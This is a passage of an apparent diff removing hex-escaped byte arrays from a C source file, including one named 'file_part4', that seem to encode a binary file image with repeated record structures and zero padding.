-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x5f\x71\x00\x00\x60\x71\x00\x00\x63\x71\x00\x00\x68\x71\x00\x00" -"\x75\x71\x00\x00\x84\x71\x00\x00\x8c\x71\x00\x00\x41\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01" -"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61" -"\x24\x01\x00\xbd\x00\x00\x6b\x64\xa5\x06\x00\x00\x16\x24\x01\x17" -"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03" -"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" 
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18" -"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b" -"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x61\xf6\x03\x00\x00\x00\x06" -"\x8c\x71\x00\x00\x9a\x71\x00\x00\x9b\x71\x00\x00\x9e\x71\x00\x00" -"\xa3\x71\x00\x00\xb0\x71\x00\x00\xbf\x71\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\xf5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x98\x07\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xbf\x71\x00\x00\xc6\x71\x00\x00\xce\x71\x00\x00\xcf\x71\x00\x00" -"\xd2\x71\x00\x00\xd7\x71\x00\x00\xe4\x71\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x8b\x08\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\x9a\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" 
-"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xe4\x71\x00\x00\xf3\x71\x00\x00\xfb\x71\x00\x00\xff\x71\x00\x00" -"\x00\x72\x00\x00\x03\x72\x00\x00\x07\x72\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x7e\x09\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xa3\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x07\x72\x00\x00\x13\x72\x00\x00\x22\x72\x00\x00\x33\x72\x00\x00" -"\x3b\x72\x00\x00\x3c\x72\x00\x00\x3f\x72\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x71\x0a\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" 
-"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x3f\x72\x00\x00\x44\x72\x00\x00\x4e\x72\x00\x00\x5d\x72\x00\x00" -"\x67\x72\x00\x00\x6b\x72\x00\x00\x6c\x72\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x64\x0b\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -; -char file_part4[]= -"\x6c\x72\x00\x00\x6f\x72\x00\x00\x75\x72\x00\x00\x80\x72\x00\x00" -"\x8f\x72\x00\x00\x96\x72\x00\x00\x9e\x72\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" 
-"\x9e\x72\x00\x00\x9f\x72\x00\x00\xa2\x72\x00\x00\xa8\x72\x00\x00" -"\xb6\x72\x00\x00\xc5\x72\x00\x00\xd4\x72\x00\x00\x41\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01" -"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61" -"\x24\x01\x00\xbd\x00\x00\x6b\x64\x57\x0c\x00\x00\x16\x24\x01\x17" -"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03" -"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00" -"\x00\x00\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18" -"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b" -"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" 
-"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x61\xf6\x03\x00\x00\x00\x06" -"\xd4\x72\x00\x00\xe1\x72\x00\x00\xe2\x72\x00\x00\xe5\x72\x00\x00" -"\xea\x72\x00\x00\xf4\x72\x00\x00\x03\x73\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x4a\x0d\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" 